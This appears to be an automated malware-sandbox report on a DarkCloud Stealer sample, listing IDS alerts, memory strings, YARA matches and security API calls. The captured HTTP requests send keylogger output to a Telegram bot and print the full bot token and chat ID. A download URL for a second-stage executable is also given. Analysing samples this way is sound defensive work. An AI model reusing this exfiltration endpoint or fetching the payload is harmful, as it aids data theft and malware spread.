Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49716 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49711 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49711 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49711 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 2779 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 2746 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 2647 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 2350 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 1426 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 898 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 601 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 568 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 601 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 568 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 568 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KeyDatabcwuTujf.txt:::user-PC\user\ HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 601 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 601 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: nfs.sa.com
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 2779 | Connection: Keep-Alive | Cache-Control: no-cache
Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://certificates.godaddy.com/repository/0
Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.godaddy.com/gdig2s1-19134.crl0
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
Source: ECmmsbHOaKPh.exe, 0000000D.00000002.1701564007.0000000002E69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nfs.sa.com
Source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.godaddy.com/0
Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.godaddy.com/02
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.godaddy.com/05
Source: g44YQtTyjN.exe, 00000000.00000002.1500391949.0000000002461000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1701564007.0000000002B11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe | String found in binary or memory: http://showip.net
Source: g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2559302757.0000000000431000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://showip.netxhttp://www.mediacollege.com/internet/utilities/show-ip.shtml
Source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.dr | String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: RegSvcs.exe | String found in binary or memory: http://www.mediacollege.com/internet/utilities/show-ip.shtml
Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/
Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/4
Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/b
Source: RegSvcs.exe | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001
Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/mplates
Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/n=DC-KL:::user-PC
Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/t
Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://certs.godaddy.com/repository/0
Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BD9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.comm
Source: g44YQtTyjN.exe, 00000000.00000002.1500391949.0000000002461000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1701564007.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1701564007.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1701564007.0000000002B86000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nfs.sa.com
Source: ECmmsbHOaKPh.exe, 0000000D.00000002.1701564007.0000000002B11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nfs.sa.com/nano/schvost.exe
Source: ECmmsbHOaKPh.exe, 0000000D.00000002.1701564007.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nfs.sa4b
Source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49717 version: TLS 1.2

System Summary

Source: 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.1502068174.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Code function: 0_2_06C68CE8 NtUnmapViewOfSection, | 0_2_06C68CE8
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Code function: 0_2_06C68CE0 NtUnmapViewOfSection, | 0_2_06C68CE0
Source: g44YQtTyjN.exe | Static PE information: invalid certificate
Source: g44YQtTyjN.exe, 00000000.00000002.1500391949.0000000002664000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameutilize.exe vs g44YQtTyjN.exe
Source: g44YQtTyjN.exe, 00000000.00000002.1518307572.000000000B000000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs g44YQtTyjN.exe
Source: g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs g44YQtTyjN.exe
Source: g44YQtTyjN.exe, 00000000.00000000.1308952119.00000000000D2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameGCbd.exeB vs g44YQtTyjN.exe
Source: g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameutilize.exe vs g44YQtTyjN.exe
Source: g44YQtTyjN.exe, 00000000.00000002.1499082414.000000000066E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs g44YQtTyjN.exe
Source: g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003E1C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameutilize.exe vs g44YQtTyjN.exe
Source: g44YQtTyjN.exe | Binary or memory string: OriginalFilenameGCbd.exeB vs g44YQtTyjN.exe
Source: g44YQtTyjN.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1502068174.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: g44YQtTyjN.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ECmmsbHOaKPh.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, c7051ZPN8xVt8hUhsG.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, c7051ZPN8xVt8hUhsG.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, c7051ZPN8xVt8hUhsG.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, nE18TyFNSpZFYFqNG7.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, nE18TyFNSpZFYFqNG7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, nE18TyFNSpZFYFqNG7.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, nE18TyFNSpZFYFqNG7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, c7051ZPN8xVt8hUhsG.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, c7051ZPN8xVt8hUhsG.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, c7051ZPN8xVt8hUhsG.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, nE18TyFNSpZFYFqNG7.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, nE18TyFNSpZFYFqNG7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, c7051ZPN8xVt8hUhsG.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, c7051ZPN8xVt8hUhsG.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, c7051ZPN8xVt8hUhsG.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
